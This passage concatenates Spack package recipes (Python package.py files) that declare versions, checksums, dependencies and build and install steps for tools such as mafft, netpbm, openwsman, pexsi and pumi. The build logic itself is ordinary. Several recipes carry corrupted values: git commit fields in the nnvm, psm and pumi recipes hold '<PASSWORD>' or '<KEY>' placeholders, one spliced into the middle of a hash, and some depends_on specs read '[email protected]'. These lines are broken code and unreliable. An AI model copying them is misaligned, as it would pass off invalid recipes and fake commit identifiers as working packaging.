url = "https://github.com/lyonel/lshw/archive/B.02.18.tar.gz"
version('02.18', sha256='aa8cb2eebf36e9e46dfc227f24784aa8c87181ec96e57ee6c455da8a0ce4fa77')
version('02.17', sha256='0bb76c7df7733dc9b80d5d35f9d9752409ddb506e190453a2cc960461de5ddeb')
version('02.16', sha256='58a7731d204791dd33db5eb3fde9808d1235283e069e6c33a193637ccec27b3e')
version('02.15', sha256='33c51ba0554d4bcd8ff9a67e5971a63b9ddd58213e2901a09000815376bc61b9')
def install(self, spec, prefix):
make('install')
install_tree('.', prefix)
```
#### File: packages/mafft/package.py
```python
from spack.package import *
class Mafft(Package):
"""MAFFT is a multiple sequence alignment program for unix-like
operating systems. It offers a range of multiple alignment
methods, L-INS-i (accurate; for alignment of <~200 sequences),
FFT-NS-2 (fast; for alignment of <~30,000 sequences), etc."""
homepage = "https://mafft.cbrc.jp/alignment/software/index.html"
url = "https://mafft.cbrc.jp/alignment/software/mafft-7.221-with-extensions-src.tgz"
version('7.481', sha256='7397f1193048587a3d887e46a353418e67849f71729764e8195b218e3453dfa2')
version('7.475', sha256='bb6973ae089ea18cfbd3861a5b9d2c8b7e1543a1fdc78ac2d7cd8dbe3443f319')
version('7.453', sha256='8b2f0d6249c575f80cd51278ab45dd149b8ac9b159adac20fd1ddc7a6722af11')
version('7.407', sha256='1840b51a0b93f40b4d6076af996ee46396428d8dbaf7ba1d847abff9cb1463e5')
version('7.221', sha256='0bc78111966d9b00ddfa14fa217fa5bb0c593a558674a13f02dca7bcd51f7fcf')
def install(self, spec, prefix):
with working_dir('core'):
make('PREFIX=%s' % prefix)
make('PREFIX=%s' % prefix, 'install')
with working_dir('extensions'):
make('PREFIX=%s' % prefix)
make('PREFIX=%s' % prefix, 'install')
```
#### File: packages/minismac2d/package.py
```python
from spack.package import *
class Minismac2d(MakefilePackage):
"""Proxy Application. Solves the finite-differenced 2D incompressible
Navier-Stokes equations with Spalart-Allmaras one-equation
turbulence model on a structured body conforming grid.
"""
homepage = "https://mantevo.org"
url = "https://downloads.mantevo.org/releaseTarballs/miniapps/MiniSMAC2D/miniSMAC2D-2.0.tgz"
tags = ['proxy-app']
version('2.0', sha256='ec01b74c06a2c0386efbbb61b14305327342a08fb92bf52e76f60a2063adf065')
depends_on('mpi')
parallel = False
@property
def build_targets(self):
targets = [
'CPP=cpp',
'FC={0}'.format(self.spec['mpi'].mpifc),
'LD={0}'.format(self.spec['mpi'].mpifc),
'MPIDIR=-I{0}'.format(self.spec['mpi'].headers.directories[0]),
'CPPFLAGS=-P -traditional -DD_PRECISION',
'FFLAGS=-O3 -c -g -DD_PRECISION',
'LDFLAGS=-O3',
'--file=Makefile_mpi_only'
]
return targets
def edit(self, spec, prefix):
# Editing input file to point to installed data files
param_file = FileFilter('smac2d.in')
param_file.filter('bcmain_directory=.*', "bcmain_directory='.'")
param_file.filter('bcmain_filename=.*',
"bcmain_filename='bcmain.dat_original_119x31'")
param_file.filter('xygrid_directory=.*', "xygrid_directory='.'")
param_file.filter('xygrid_filename=.*',
"xygrid_filename='xy.dat_original_119x31'")
def install(self, spec, prefix):
# Manual Installation
mkdirp(prefix.bin)
mkdirp(prefix.doc)
install('smac2d_mpi_only', prefix.bin)
install('bcmain.dat_original_119x31', prefix.bin)
install('xy.dat_original_119x31', prefix.bin)
install('smac2d.in', prefix.bin)
install('README.txt', prefix.doc)
```
#### File: packages/mixcr/package.py
```python
from spack.package import *
class Mixcr(Package):
"""MiXCR is a universal framework that processes big immunome data from
raw sequences to quantitated clonotypes. MiXCR efficiently handles
paired- and single-end reads, considers sequence quality, corrects PCR
errors and identifies germline hypermutations. The software supports
both partial- and full-length profiling and employs all available RNA or
DNA information, including sequences upstream of V and downstream of J
gene segments."""
homepage = "https://mixcr.readthedocs.io/en/master/index.html"
url = "https://github.com/milaboratory/mixcr/releases/download/v3.0.2/mixcr-3.0.2.zip"
version('3.0.2', sha256='b4dcad985053438d5f5590555f399edfbd8cb514e1b9717620ee0ad0b5eb6b33')
depends_on('java@8:')
def install(self, spec, prefix):
install_tree('.', prefix)
def setup_run_environment(self, env):
env.prepend_path('PATH', self.prefix)
```
#### File: packages/mysqlpp/package.py
```python
from spack.package import *
class Mysqlpp(AutotoolsPackage):
"""MySQL++ is a C++ wrapper for MySQL and MariaDB C APIs. It is built on
the same principles as the Standard C++ Library to make dealing with the
database as easy as dealing with std containers. MySQL++ also provides
facilities that let you avoid the most repetitive sorts of SQL within your
own code, providing native C++ interfaces for these common tasks."""
homepage = "https://tangentsoft.com/mysqlpp/home"
url = "https://tangentsoft.com/mysqlpp/releases/mysql++-3.2.5.tar.gz"
version('3.3.0', sha256='449cbc46556cc2cc9f9d6736904169a8df6415f6960528ee658998f96ca0e7cf')
version('3.2.5', sha256='839cfbf71d50a04057970b8c31f4609901f5d3936eaa86dab3ede4905c4db7a8')
depends_on('mysql-client')
def configure_args(self):
if '^mariadb-c-client' in self.spec:
args = [
'--with-mysql-include={0}'.format(
self.spec['mysql-client'].prefix.include.mariadb),
'--with-mysql-lib={0}'.format(
self.spec['mysql-client'].prefix.lib.mariadb),
]
else:
args = [
'--with-mysql={0}'.format(self.spec['mysql-client'].prefix),
]
return args
```
#### File: packages/netpbm/package.py
```python
import os
from shutil import copyfile
from spack.package import *
class Netpbm(MakefilePackage):
"""Netpbm - graphics tools and converters.
A whole bunch of utilities for primitive manipulation of
graphic images. Wide array of converters
from one graphics format to another. E.g.
from g3 fax format to jpeg. Many basic graphics
editing tools such as magnifying and cropping.
"""
homepage = "http://netpbm.sourceforge.net"
url = "https://sourceforge.net/projects/netpbm/files/super_stable/10.73.35/netpbm-10.73.35.tgz"
maintainers = ['cessenat']
version('10.73.35', sha256='628dbe8490bc43557813d1fedb2720dfdca0b80dd3f2364cb2a45c6ff04b0f18')
# As a default we wish to commpile absolutely everything at once.
# Variants are there in case compilation was a problem.
variant('all', default=True,
description='Enable all 3rd party libs')
variant('X', default=True,
description='Enable X libs for pamx')
variant('fiasco', default=True,
description='Enable fiasco')
variant('ghostscript', default=True,
description='Ghostscript is called by pstopnm and pbmtextps')
# netpbm can provide it's own jasper and jbig : better use the ones
# from their respective spack package.
variant('builtin', default=False,
description='Use builtin libs instead of 3rd party')
depends_on('perl', type=('build', 'run'))
depends_on('gmake', type='build')
depends_on('pkgconfig', type='build')
# These are general pre-requisites indicated at
# http://netpbm.sourceforge.net/prereq.html
depends_on('zlib')
depends_on('jpeg')
depends_on('libtiff')
depends_on('libpng')
# Ghostscript is called as "gs" by pstopnm and pbmtextps
depends_on('ghostscript', type='run', when='+ghostscript')
# These are the optional libs:
# svgtopam : http://netpbm.sourceforge.net/prereq.html
# homebrew also sets a dependancy to libxml2
# https://github.com/Homebrew/homebrew-core/blob/HEAD/Formula/netpbm.rb
depends_on('libxml2', when='+all')
# thinkjettopbm : http://netpbm.sourceforge.net/prereq.html
depends_on('flex', type=('build', 'run'), when='+all')
# https://formulae.brew.sh/formula/netpbm
depends_on('jasper', when='+all~builtin')
# Only Mac Ports sets a dependency to jbig
# https://ports.macports.org/port/netpbm/summary
depends_on('jbigkit', when='+all~builtin')
# pamx depends on X11 libraries:
depends_on('libx11', when='+X')
def edit(self, spec, prefix):
# We better not run the interactive perl script buildtools/configure.pl
# as explained by Todd in
# https://groups.google.com/g/spack/c/8sEqDkZ68DA/m/wpbB0wHaAgAJ
# so we will mimic the perl script bahavior
copyfile('config.mk.in', 'config.mk')
config = []
config.append('####Lines above were copied from config.mk.in')
# This is already the default but we make sure it is set
# even for a dev release for instance:
config.append('DEFAULT_TARGET = nonmerge')
config.append('NETPBMLIBSUFFIX={0}'.format(dso_suffix))
if 'platform=darwin' in spec:
config.append('NETPBMLIBTYPE=dylib')
args = ['-dynamiclib', '-Wl,-install_name']
args.append('-Wl,@rpath/libnetpbm.dylib')
config.append('LDSHLIB = {0}'.format(' '.join(args)))
elif 'platform=cygwin' in spec:
config.append('NETPBMLIBTYPE=dll')
config.append('NETPBMLIBSUFFIX=dll')
config.append('SHLIBPREFIXLIST=cyg lib')
config.append('EXE = .exe')
config.append('SYMLINK = cp')
config.append('LINKERISCOMPILER = Y')
config.append('WINICON_OBJECT = $(BUILDDIR)/icon/netpbm.o')
config.append('DLLVER=$(NETPBM_MAJOR_RELEASE)')
args = ['-shared', '-Wl,--image-base=0x10000000']
args.append('-Wl,--enable-auto-import')
config.append('LDSHLIB = {0}'.format(' '.join(args)))
else:
config.append('NETPBMLIBTYPE=unixshared')
if '~fiasco' in spec:
config.append('BUILD_FIASCO = N')
config.append('STATICLIB_TOO=Y')
config.append('OMIT_NETWORK = Y')
config.append('CC = {0}'.format(spack_cc))
config.append('LD = {0}'.format(spack_cc))
config.append('CC_FOR_BUILD = {0}'.format(spack_cc))
config.append('LD_FOR_BUILD = {0}'.format(spack_cc))
config.append('CFLAGS_SHLIB += {0}'.format(self.compiler.cc_pic_flag))
if '%gcc' in spec or 'platform=darwin' in spec:
cflags = ['-O3', '-ffast-math', '-pedantic', '-Wall', '-Wimplicit']
cflags.extend(['-Wno-uninitialized', '-Wmissing-declarations'])
cflags.extend(['-Wwrite-strings', '-Wmissing-prototypes'])
cflags.extend(['-Wundef', '-Wno-unknown-pragmas'])
if 'platform=darwin' in spec:
# https://github.com/macports/macports-ports/blob/master/graphics/netpbm/Portfile
cflags.append('-D_DARWIN_C_SOURCE')
# https://www.linuxquestions.org/questions/linux-from-scratch-13/can't-compile-luit-xorg-applications-4175476308/
# cflags.append('-U_XOPEN_SOURCE')
# https://www.mistys-internet.website/blog/blog/2013/10/19/no-cpp-precomp-the-compiler-flag-that-time-forgot/
# cflags.append('-no-cpp-precomp')
config.append('CFLAGS = {0}'.format(' '.join(cflags)))
config.append('CFLAGS_SHLIB += -fno-common')
if '+all' in spec:
flex = join_path(spec['flex'].prefix.bin, 'flex')
if os.path.exists(flex):
config.append('LEX = {0}'.format(flex))
config.append('TIFFLIB={0}'.format(
spec['libtiff'].libs.ld_flags))
config.append('TIFFHDR_DIR={0}'.format(
spec['libtiff'].headers.directories[0]))
config.append('PNGLIB={0}'.format(
spec['libpng'].libs.ld_flags))
config.append('PNGHDR_DIR={0}'.format(
spec['libpng'].headers.directories[0]))
config.append('JPEGLIB={0}'.format(
spec['jpeg'].libs.ld_flags))
config.append('JPEGHDR_DIR={0}'.format(
spec['jpeg'].headers.directories[0]))
if '+all' in spec and '+builtin' not in spec:
config.append('JASPERLIB={0}'.format(
spec['jasper'].libs.ld_flags))
config.append('JASPERHDR_DIR={0}'.format(
spec['jasper'].headers.directories[0]))
config.append('JBIGLIB={0}'.format(
spec['jbigkit'].libs.ld_flags))
config.append('JBIGHDR_DIR={0}'.format(
spec['jbigkit'].headers.directories[0]))
if '+X' in spec:
pkg_config = which('pkg-config')
if not pkg_config('x11', '--exists'):
config.append('X11LIB={0}'.format(
spec['libx11'].libs.ld_flags))
config.append('X11HDR_DIR={0}'.format(
spec['libx11'].headers.directories[0]))
config.append('ZLIB={0}'.format(spec['zlib'].libs.ld_flags))
config.append('NETPBM_DOCURL = http://netpbm.sourceforge.net/doc/')
if spec.target.family == 'x86_64':
config.append('WANT_SSE = Y')
with open('config.mk', 'a') as mk:
mk.write('\n'.join(config))
def build(self, spec, prefix):
make()
def install(self, spec, prefix):
bdir = join_path(self.build_directory, 'build')
make('package', 'pkgdir={0}'.format(bdir), parallel=False)
# Same as before build, mimic the interactive
# perl script buildtools/installnetpbm.pl
mkdirp(prefix.bin)
mkdirp(prefix.lib)
mkdirp(prefix.include)
mkdirp(prefix.man)
with working_dir('build'):
install_tree("bin", prefix.bin)
install_tree("lib", prefix.lib)
install_tree("misc", prefix.lib)
install_tree("include", prefix.include)
install_tree(join_path("include", "netpbm"), prefix.include)
if os.path.exists('man'):
install_tree("man", prefix.man)
# As a default a static lib is also created.
# We could put that as an option
staticlib = join_path('staticlink', 'libnetpbm.a')
if os.path.exists(staticlib):
install(staticlib, prefix.lib)
else:
staticlib = join_path('link', 'libnetpbm.a')
if os.path.exists(staticlib):
install(staticlib, prefix.lib)
# Make the .pc as done by installnetpbm.pl
src = join_path('buildtools', 'pkgconfig_template')
pdir = join_path(prefix.lib, 'pkgconfig')
mkdirp(pdir)
copyfile(src, join_path(pdir, 'netpbm.pc'))
pfic = FileFilter(join_path(pdir, 'netpbm.pc'))
pfic.filter('@VERSION@', 'Netpbm {0}'.format(str(spec.version)))
pfic.filter('@LINKDIR@', '{0}'.format(prefix.lib))
pfic.filter('@INCLUDEDIR@', '{0}'.format(prefix.include))
```
#### File: packages/nnvm/package.py
```python
from spack.package import *
class Nnvm(CMakePackage):
"""nnvm is a modular, decentralized and lightweight
part to help build deep learning libraries."""
homepage = "https://github.com/dmlc/nnvm"
git = "https://github.com/dmlc/nnvm.git"
version('master', branch='master')
version('20170418', commit='<PASSWORD>')
variant('shared', default=True, description='Build a shared NNVM lib.')
depends_on('dmlc-core')
patch('cmake.patch')
patch('cmake2.patch', when='@20170418')
def cmake_args(self):
spec = self.spec
return [
self.define_from_variant('USE_SHARED_NNVM', 'shared'),
'-DUSE_STATIC_NNVM=%s' % ('ON' if '~shared' in spec else 'OFF'),
]
```
#### File: packages/openwsman/package.py
```python
from spack.package import *
class Openwsman(CMakePackage):
"""Openwsman server implementation and client api with bindings."""
homepage = "https://github.com/Openwsman/openwsman"
url = "https://github.com/Openwsman/openwsman/archive/v2.6.11.tar.gz"
version('2.7.0', sha256='8870c4a21cbaba9387ad38c37667e2cee29008faacaaf7eb18ad2061e2fc89a1')
version('2.6.11', sha256='895eaaae62925f9416766ea3e71a5368210e6cfe13b23e4e0422fa0e75c2541c')
version('2.6.10', sha256='d3c624a03d7bc1835544ce1af56efd010f77cbee0c02b34e0755aa9c9b2c317b')
variant('python', default=True, description='Enable python')
extends('python', when='+python')
depends_on('python', type=('build', 'link', 'run'))
depends_on('curl', type='link')
depends_on('swig', type='build')
depends_on('libxml2', type='link')
depends_on('openssl', type='link')
depends_on('sblim-sfcc', type='link')
def patch(self):
""" Change python install directory. """
if self.spec.satisfies('+python'):
python_spec = self.spec['python']
python_libdir = join_path(
self.spec.prefix.lib,
'python' + str(python_spec.version.up_to(2)),
'site-packages'
)
filter_file(
'DESTINATION .*',
'DESTINATION {0} )'.format(python_libdir),
join_path('bindings', 'python', 'CMakeLists.txt')
)
def cmake_args(self):
define = self.define
spec = self.spec
arg = [
define('BUILD_PERL', False),
define('BUILD_JAVA', False),
define('BUILD_CSHARP', False),
define('USE_PAM', 'OFF'),
]
if spec.satisfies('+python'):
if spec.satisfies('^python@3:'):
arg.extend([
define('BUILD_PYTHON', False),
define('BUILD_PYTHON3', True)
])
else:
arg.extend([
define('BUILD_PYTHON', True),
define('BUILD_PYTHON3', False)
])
arg.append(define('PYTHON_EXECUTABLE',
spec['python'].command.path))
else:
arg.extend([
define('BUILD_PYTHON', False),
define('BUILD_PYTHON3', False)
])
return arg
def flag_handler(self, name, flags):
flags = list(flags)
if name == 'cflags':
if self.spec.satisfies('%gcc'):
flags.append('-std=gnu99')
else:
flags.append(self.compiler.c99_flag)
return (None, None, flags)
```
#### File: packages/ovito/package.py
```python
from spack.package import *
class Ovito(Package):
"""OVITO is a scientific visualization and analysis software for atomistic
and particle simulation data. It helps scientists gain better insights into
materials phenomena and physical processes. OVITO Basic is freely available
for all major platforms under an open source license. It has served in a
growing number of computational simulation studies as a powerful tool to
analyze, understand and illustrate simulation results."""
homepage = "https://www.ovito.org"
url = "https://www.ovito.org/download/master/ovito-basic-3.6.0-x86_64.tar.xz"
version('3.6.0', '6ac43a3a39b1ec3cccab577602756a8b7010cc1f1f046c4f6a939590d12f0339')
def install(self, spec, prefix):
# Once we've unpacked the tarball, copy it's contents to the prefix
copy_tree('.', prefix)
```
#### File: packages/parallelmergetree/package.py
```python
from spack.package import *
class Parallelmergetree(CMakePackage):
"""A multi-runtime implementation of a distributed merge tree
segmentation algorithm. The implementation relies on the framework
BabelFlow, which allows to execute the algorithm on different runtime
systems."""
homepage = "https://bitbucket.org/cedmav/parallelmergetree"
git = "https://bitbucket.org/cedmav/parallelmergetree.git"
maintainers = ['spetruzza']
version('1.1.2',
git='https://bitbucket.org/cedmav/parallelmergetree.git',
tag='v1.1.2',
submodules=True)
version('1.1.1',
git='https://bitbucket.org/cedmav/parallelmergetree.git',
tag='v1.1.1',
submodules=True)
version('1.1.0',
git='https://bitbucket.org/cedmav/parallelmergetree.git',
tag='v1.1.0',
submodules=True)
version('1.0.2',
git='https://bitbucket.org/cedmav/parallelmergetree.git',
tag='v1.0.2',
submodules=True)
version('1.0.0',
git='https://bitbucket.org/cedmav/parallelmergetree.git',
tag='v1.0.0',
submodules=True)
depends_on('[email protected]', when='@1.1.2')
depends_on('[email protected]', when='@1.1.1')
depends_on('[email protected]', when='@1.1.0')
depends_on('[email protected]', when='@1.0.2')
variant("shared", default=True, description="Build ParallelMergeTree as shared libs")
# The C++ headers of gcc-11 don't provide <algorithm> as side effect of others
@when('%gcc@11:')
def setup_build_environment(self, env):
env.append_flags('CXXFLAGS', '-include algorithm')
def cmake_args(self):
args = []
if "+shared" in self.spec:
args.append('-DBUILD_SHARED_LIBS=ON')
else:
args.append('-DBUILD_SHARED_LIBS=OFF')
args.append('-DLIBRARY_ONLY=ON')
args.append('-DBabelFlow_DIR={0}'.format(
self.spec['babelflow'].prefix))
return args
```
#### File: packages/perl-db-file/package.py
```python
from spack.package import *
class PerlDbFile(PerlPackage):
"""DB_File is a module which allows Perl programs to make use of the
facilities provided by Berkeley DB version 1.x (if you have a newer version
of DB, see "Using DB_File with Berkeley DB version 2 or greater").
It is assumed that you have a copy of the Berkeley DB manual pages at hand
when reading this documentation. The interface defined here mirrors the
Berkeley DB interface closely."""
homepage = "https://metacpan.org/pod/DB_File"
url = "https://cpan.metacpan.org/authors/id/P/PM/PMQS/DB_File-1.840.tar.gz"
version('1.840', sha256='b7864707fad0f2d1488c748c4fa08f1fb8bcfd3da247c36909fd42f20bfab2c4')
depends_on('perl-extutils-makemaker', type='build')
depends_on('berkeley-db', type='build')
def patch(self):
filter_file('/usr/local/BerkeleyDB',
self.spec['berkeley-db'].prefix, 'config.in')
```
#### File: packages/pexsi/package.py
```python
import inspect
import os.path
from spack.package import *
class Pexsi(MakefilePackage):
"""The PEXSI library is written in C++, and uses message passing interface
(MPI) to parallelize the computation on distributed memory computing
systems and achieve scalability on more than 10,000 processors.
The Pole EXpansion and Selected Inversion (PEXSI) method is a fast
method for electronic structure calculation based on Kohn-Sham density
functional theory. It efficiently evaluates certain selected elements
of matrix functions, e.g., the Fermi-Dirac function of the KS Hamiltonian,
which yields a density matrix. It can be used as an alternative to
diagonalization methods for obtaining the density, energy and forces
in electronic structure calculations.
"""
homepage = 'https://math.berkeley.edu/~linlin/pexsi/index.html'
url = 'https://math.berkeley.edu/~linlin/pexsi/download/pexsi_v0.9.0.tar.gz'
# version('1.0', sha256='1574c66fd69ff2a37c6250d65c4df43b57c79822b49bd65662582a0cd5d82f54')
version('0.10.2', sha256='8714c71b76542e096211b537a9cb1ffb2c28f53eea4f5a92f94cc1ca1e7b499f')
version('0.9.0', sha256='e5efe0c129013392cdac3234e37f1f4fea641c139b1fbea47618b4b839d05029')
depends_on('parmetis')
depends_on('[email protected]:5.3', when='@0.10.2:')
variant(
'fortran', default=False, description='Builds the Fortran interface'
)
parallel = False
def edit(self, spec, prefix):
substitutions = [
('@MPICC', self.spec['mpi'].mpicc),
('@MPICXX_LIB', self.spec['mpi:cxx'].libs.joined()),
('@MPICXX', self.spec['mpi'].mpicxx),
('@MPIFC', self.spec['mpi'].mpifc),
('@RANLIB', 'ranlib'),
('@PEXSI_STAGE', self.stage.source_path),
('@SUPERLU_PREFIX', self.spec['superlu-dist'].prefix),
('@METIS_PREFIX', self.spec['metis'].prefix),
('@PARMETIS_PREFIX', self.spec['parmetis'].prefix),
('@LAPACK_PREFIX', self.spec['lapack'].prefix),
('@BLAS_PREFIX', self.spec['blas'].prefix),
('@LAPACK_LIBS', self.spec['lapack'].libs.joined()),
('@BLAS_LIBS', self.spec['blas'].libs.joined()),
# FIXME : what to do with compiler provided libraries ?
('@STDCXX_LIB', ' '.join(self.compiler.stdcxx_libs))
]
fldflags = ''
if '@0.9.2' in self.spec:
fldflags += ' -Wl,--allow-multiple-definition'
if ('^superlu +openmp' in self.spec
or '^openblas threads=openmp' in self.spec):
fldflags += ' ' + self.compiler.openmp_flag
substitutions.append(('@FLDFLAGS', fldflags.lstrip()))
template = join_path(
os.path.dirname(inspect.getmodule(self).__file__),
'make.inc'
)
makefile = join_path(
self.stage.source_path,
'make.inc'
)
copy(template, makefile)
for key, value in substitutions:
filter_file(key, value, makefile)
def build(self, spec, prefix):
super(Pexsi, self).build(spec, prefix)
if '+fortran' in self.spec:
make('-C', 'fortran')
def install(self, spec, prefix):
# 'make install' does not exist, despite what documentation says
mkdirp(self.prefix.lib)
install(
join_path(self.stage.source_path, 'src', 'libpexsi_linux.a'),
join_path(self.prefix.lib, 'libpexsi.a')
)
install_tree(
join_path(self.stage.source_path, 'include'),
self.prefix.include
)
# fortran "interface"
if '+fortran' in self.spec:
install_tree(
join_path(self.stage.source_path, 'fortran'),
join_path(self.prefix, 'fortran')
)
```
#### File: packages/phred/package.py
```python
import os
from spack.package import *
class Phred(MakefilePackage):
"""The phred software reads DNA sequencing trace files, calls bases,
and assigns a quality value to each called base."""
homepage = "http://www.phrap.org/phredphrapconsed.html"
url = "file://{0}/phred.tar.gz".format(os.getcwd())
manual_download = True
version('071220', sha256='26212f13fa906c1ca0af61f48d52a5f2c1aacba802bf729ba65ca5222463abce')
def install(self, spec, prefix):
mkdirp(prefix.bin)
install('phred', prefix.bin)
```
#### File: packages/phylip/package.py
```python
from spack.package import *
class Phylip(Package):
"""PHYLIP (the PHYLogeny Inference Package) is a package of programs for
inferring phylogenies (evolutionary trees)."""
homepage = "https://evolution.genetics.washington.edu/phylip/"
url = "https://evolution.gs.washington.edu/phylip/download/phylip-3.697.tar.gz"
version('3.697', sha256='9a26d8b08b8afea7f708509ef41df484003101eaf4beceb5cf7851eb940510c1')
def install(self, spec, prefix):
with working_dir('src'):
if self.spec.satisfies('platform=darwin'):
make('all', '-f', 'Makefile.osx')
make('put', '-f', 'Makefile.osx')
else:
make('all', '-f', 'Makefile.unx')
make('put', '-f', 'Makefile.unx')
install_tree('exe', prefix.bin)
```
#### File: packages/pinfo/package.py
```python
from spack.package import *
class Pinfo(AutotoolsPackage):
"""Pinfo is user-friendly, console-based viewer for Info documents."""
homepage = "https://github.com/baszoetekouw/pinfo"
url = "https://github.com/baszoetekouw/pinfo/archive/v0.6.13.tar.gz"
version('0.6.13', sha256='9dc5e848a7a86cb665a885bc5f0fdf6d09ad60e814d75e78019ae3accb42c217')
version('0.6.12', sha256='82af48ba23b8c26b1f4e67b45f718142eb0f760326b782f80c765801d3532077')
version('0.6.11', sha256='fd26017ac9db179d709b49e450c3097e7d6f99cd94de7b5da824ec757c6992b2')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('m4', type='build')
depends_on('gettext', type='build')
depends_on('texinfo', type='build')
def configure_args(self):
args = ['CFLAGS=-Wno-unused-parameter']
return args
```
#### File: packages/ppopen-appl-fvm/package.py
```python
from spack.package import *
class PpopenApplFvm(MakefilePackage):
"""
ppOpen-APPL/FVM ia a coupling library that enables weak
coupling on various simulation models, such as an
atmospheric model and an ocean model, a seismic model
and a structure model. For getting very wide
applicability, ppohMATHMP is designed so as that it is
independent from grid structure. Instead of grid
structure, ppOpen-APPL/FVM requires a data set
called 'mapping table'. Mapping table is composed of
a correspondence table of grid indexes between a send
model and a receive model and interpolation coefficients.
A subroutine for making a mapping table file is provided
by ppohMATHMP API.
Current version of ppohMATHMP is ver.1.0 which targets
scalar data exchange. An exchange code of vector data
which requires rotation calculation is under
"""
homepage = "http://ppopenhpc.cc.u-tokyo.ac.jp/ppopenhpc/"
git = "https://github.com/Post-Peta-Crest/ppOpenHPC.git"
version('master', branch='APPL/FVM')
depends_on('mpi')
depends_on('metis@:4')
def edit(self, spec, prefix):
mkdirp('bin')
mkdirp('lib')
mkdirp('include')
fflags = ['-O3']
if spec.satisfies('%gcc'):
fflags.append('-ffree-line-length-none')
makefile_in = FileFilter('Makefile.in')
makefile_in.filter(
r'^PREFIX *=.*$',
'PREFIX = {0}'.format(prefix)
)
makefile_in.filter(
r'^METISDIR *=.*$',
'METISDIR = {0}'.format(spec['metis'].prefix.lib)
)
makefile_in.filter('mpifrtpx', spec['mpi'].mpifc)
makefile_in.filter('frtpx', spack_fc)
makefile_in.filter('-Kfast', ' '.join(fflags))
makefile_in.filter(
',openmp',
' {0}'.format(self.compiler.openmp_flag)
)
def install(self, spec, prefix):
make('install')
install_tree('examples', prefix.examples)
install_tree('doc', prefix.doc)
```
#### File: packages/prinseq-lite/package.py
```python
from spack.package import *
class PrinseqLite(Package):
"""PRINSEQ will help you to preprocess your genomic or metagenomic
sequence data in FASTA or FASTQ format."""
homepage = "http://prinseq.sourceforge.net"
url = "https://sourceforge.net/projects/prinseq/files/standalone/prinseq-lite-0.20.4.tar.gz"
version('0.20.4', sha256='9b5e0dce3b7f02f09e1cc7e8a2dd77c0b133e5e35529d570ee901f53ebfeb56f')
variant('nopca', default=True, description="Graphs version without PCA")
depends_on('perl', type='run')
depends_on('perl-cairo', type='run')
depends_on('perl-digest-md5', type='run')
depends_on('perl-json', type='run')
def install(self, spec, prefix):
mkdirp(prefix.bin)
filter_file(r'#!/usr/bin/perl',
'#!/usr/bin/env perl',
'prinseq-graphs-noPCA.pl')
filter_file(r'#!/usr/bin/perl',
'#!/usr/bin/env perl',
'prinseq-lite.pl')
install('prinseq-graphs-noPCA.pl', prefix.bin)
install('prinseq-lite.pl', prefix.bin)
chmod = which('chmod')
chmod('+x', join_path(self.prefix.bin, 'prinseq-graphs-noPCA.pl'))
chmod('+x', join_path(self.prefix.bin, 'prinseq-lite.pl'))
```
#### File: packages/psm/package.py
```python
from spack.package import *
class Psm(MakefilePackage):
"""Intel Performance scaled messaging library"""
homepage = "https://github.com/intel/psm"
url = "https://github.com/intel/psm/archive/v3.3.tar.gz"
git = "https://github.com/intel/psm.git"
version('3.3', sha256='034b10e24d9f2967ef0f8d0f828572295e89cdfa1ba30c35e288b9b23c3dab8f', preferred=True)
version('2017-04-28', commit='<PASSWORD>')
conflicts('%gcc@6:', when='@3.3')
depends_on('uuid')
def edit(self, spec, prefix):
makefile = FileFilter('Makefile')
makefile.filter('{DESTDIR}/usr/', '{LOCAL_PREFIX}/')
def install(self, spec, prefix):
make('LOCAL_PREFIX=%s' % prefix, 'install')
```
#### File: packages/pumi/package.py
```python
from spack.package import *
class Pumi(CMakePackage):
"""SCOREC RPI's Parallel Unstructured Mesh Infrastructure (PUMI).
An efficient distributed mesh data structure and methods to support
parallel adaptive analysis including general mesh-based operations,
such as mesh entity creation/deletion, adjacency and geometric
classification, iterators, arbitrary (field) data attachable to mesh
entities, efficient communication involving entities duplicated
across multiple tasks, migration of mesh entities between tasks,
and dynamic load balancing."""
homepage = "https://www.scorec.rpi.edu/pumi"
git = "https://github.com/SCOREC/core.git"
maintainers = ['cwsmith']
tags = ['e4s']
# We will use the scorec/core master branch as the 'nightly' version
# of pumi in spack. The master branch is more stable than the
# scorec/core develop branch and we prefer not to expose spack users
# to the added instability.
version('master', submodules=True, branch='master')
version('2.2.7', submodules=True, commit='<KEY>') # tag 2.2.7
version('2.2.6', commit='<PASSWORD>') # tag 2.2.6
version('2.2.5', commit='73c16eae<PASSWORD>e45ec625a5abe4915bc5<PASSWORD>') # tag 2.2.5
version('2.2.4', commit='<PASSWORD>4a8e') # tag 2.2.4
version('2.2.3', commit='<KEY>') # tag 2.2.3
version('2.2.2', commit='<KEY>') # tag 2.2.2
version('2.2.1', commit='<PASSWORD>') # tag 2.2.1
version('2.2.0', commit='<PASSWORD>') # tag 2.2.0
version('2.1.0', commit='<PASSWORD>')
variant('int64', default=False, description='Enable 64bit mesh entity ids')
variant('shared', default=False, description='Build shared libraries')
variant('zoltan', default=False, description='Enable Zoltan Features')
variant('fortran', default=False, description='Enable FORTRAN interface')
variant('testing', default=False, description='Enable all tests')
variant('simmodsuite', default='none',
values=('none', 'base', 'kernels', 'full'),
description="Enable Simmetrix SimModSuite Support: 'base' enables "
"the minimum set of functionality, 'kernels' adds CAD kernel "
"support to 'base', and 'full' enables all functionality.")
variant('simmodsuite_version_check', default=True,
description="Enable check of Simmetrix SimModSuite version. "
"Disable the check for testing new versions.")
depends_on('mpi')
depends_on('cmake@3:', type='build')
depends_on('zoltan', when='+zoltan')
depends_on('zoltan+int64', when='+zoltan+int64')
simbase = "+base"
simkernels = simbase + "+parasolid+acis+discrete"
simfull = simkernels + "+abstract+adv+advmodel\
+import+paralleladapt+parallelmesh"
depends_on('simmetrix-simmodsuite' + simbase,
when='simmodsuite=base')
depends_on('simmetrix-simmodsuite' + simkernels,
when='simmodsuite=kernels')
depends_on('simmetrix-simmodsuite' + simfull,
when='simmodsuite=full')
def cmake_args(self):
spec = self.spec
args = [
'-DSCOREC_CXX_WARNINGS=OFF',
self.define_from_variant('ENABLE_ZOLTAN', 'zoltan'),
'-DCMAKE_C_COMPILER=%s' % spec['mpi'].mpicc,
'-DCMAKE_CXX_COMPILER=%s' % spec['mpi'].mpicxx,
self.define_from_variant('BUILD_SHARED_LIBS', 'shared'),
'-DCMAKE_Fortran_COMPILER=%s' % spec['mpi'].mpifc,
self.define_from_variant('PUMI_FORTRAN_INTERFACE', 'fortran'),
'-DMDS_ID_TYPE=%s' % ('long' if '+int64' in spec else 'int'),
